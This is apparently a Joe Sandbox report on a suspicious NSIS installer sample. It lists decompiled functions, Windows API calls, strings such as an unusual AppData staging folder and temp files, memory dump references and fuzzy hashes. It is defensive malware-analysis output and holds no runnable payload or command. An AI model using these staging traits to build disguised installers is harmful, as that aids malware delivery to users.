Inst, xrefs: 00402FC2
vy, xrefs: 00402F6B
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
C:\Users\user\Desktop\ln5S7fIBkY.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 00402EDD
Error launching installer, xrefs: 00402F2D

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ln5S7fIBkY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-1106707727
Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

Function 004062B9 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063FA
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,halituses,?,00405336,halituses,00000000), ref: 0040640D
SHGetSpecialFolderLocation.SHELL32(00405336,?,00000000,halituses,?,00405336,halituses,00000000), ref: 00406449
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406457
CoTaskMemFree.OLE32(?), ref: 00406462
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
lstrlenW.KERNEL32(: Completed,00000000,halituses,?,00405336,halituses,00000000), ref: 004064E0

Strings

: Completed, xrefs: 004062E3, 004063BE, 004063C5, 004063C9, 004063E3, 004063E4, 004063F9, 0040640C, 00406428, 00406453, 00406487, 0040648D, 004064A9, 004064BC, 004064D9, 004064DF, 004064EB, 0040651E
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063CA
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406482
halituses, xrefs: 004062DE

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$halituses
API String ID: 717251189-3468386958
Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,?,00000031), ref: 004017D5

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
API String ID: 1941528284-3772663424
Opcode ID: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
Opcode Fuzzy Hash: 1aff087000cc3e25554f0ed6ab8061021059107db776a0829eeff450dd20a923
Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E

Function 004052FF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA

Strings

halituses, xrefs: 00405320, 00405330, 00405336, 00405359, 00405365

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: halituses
API String ID: 2531174081-2845610232
Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98

Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
wsprintfW.USER32 ref: 00406653
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667

Strings

\, xrefs: 00406629
%s%S.dll, xrefs: 0040664D
UXTHEME, xrefs: 0040660A

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403204
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 0040322D
wsprintfW.USER32 ref: 00403240

Strings

... %d%%, xrefs: 0040323A

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9

Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
GetLastError.KERNEL32 ref: 00405825
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
GetLastError.KERNEL32 ref: 00405844

Strings

C:\Users\user\Desktop, xrefs: 004057CE

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-2743851969
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DDA
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ln5S7fIBkY.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6), ref: 00405DF5

Strings

nsa, xrefs: 00405DC9
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DC1, 00405DC5
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 00405DBC

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1960803263
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405C25
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
